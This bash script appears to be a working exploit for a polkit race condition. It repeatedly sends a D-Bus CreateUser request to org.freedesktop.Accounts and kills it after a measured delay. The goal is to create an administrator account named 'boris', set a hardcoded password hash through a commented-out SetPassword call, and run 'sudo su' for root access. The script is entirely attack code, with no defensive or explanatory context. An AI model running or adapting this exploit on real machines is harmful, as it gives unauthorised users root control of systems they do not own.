#!/bin/bash

exists1=$(yum list installed | grep accountsservice)
exists2=$(yum list installed | grep gnome-control-center)
if [ "$exists1" = "" ] || [ "$exists2" = "" ]; then
	echo  "Required services not installed!"
else
	echo "step2"
fi

function setval { printf -v "$1" "%s" "$(cat)"; declare -p "$1"; }

timeit(){
	time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1
}

catch()
{
eval "$({
__2="$(
  { __1="$("${@:3}")"; } 2>&1;
  ret=$?;
  printf '%q=%q\n' "$1" "$__1" >&2;
  exit $ret
  )";
ret="$?";
printf '%s=%q\n' "$2" "$__2" >&2;
printf '( exit %q )' "$ret" >&2;
} 2>&1 )";
}



iters=10
tt=0.0
# $(openssl passwd -5 iaminvincible!)
password=iaminvincible!
hashed_password='5$Fv2PqfurMmI879J7$ALSJ.w4KTP.mHrHxM2FYV3ueSipCf/QSfQUlATmWuuB'

echo $hashed_password

for i in $(seq 1 $iters)
do
	catch stdout stderr timeit
	set -- $stderr
	t=$(echo $7 | cut -d 'm' -f 2 | cut -d 's' -f 1)
	tt=$(echo "$t + $tt" | bc -l)
done

kill_time=$(echo "scale=3; $tt / 2 / $iters" | bc -l)

echo Kill Time: $kill_time


re='^[0-9]+$'
while :
do
	dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep $kill_time; kill $!
	find_boris=$(id -u boris)

	if [[ $find_boris =~ $re ]] ; then
	   break;
	fi
done

echo Boris found! $find_boris

#dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$find_boris org.freedesktop.Accounts.User.SetPassword string:"$hashed_password" string:GoldenEye & sleep $kill_time ; kill $!

#su - boris
sudo su
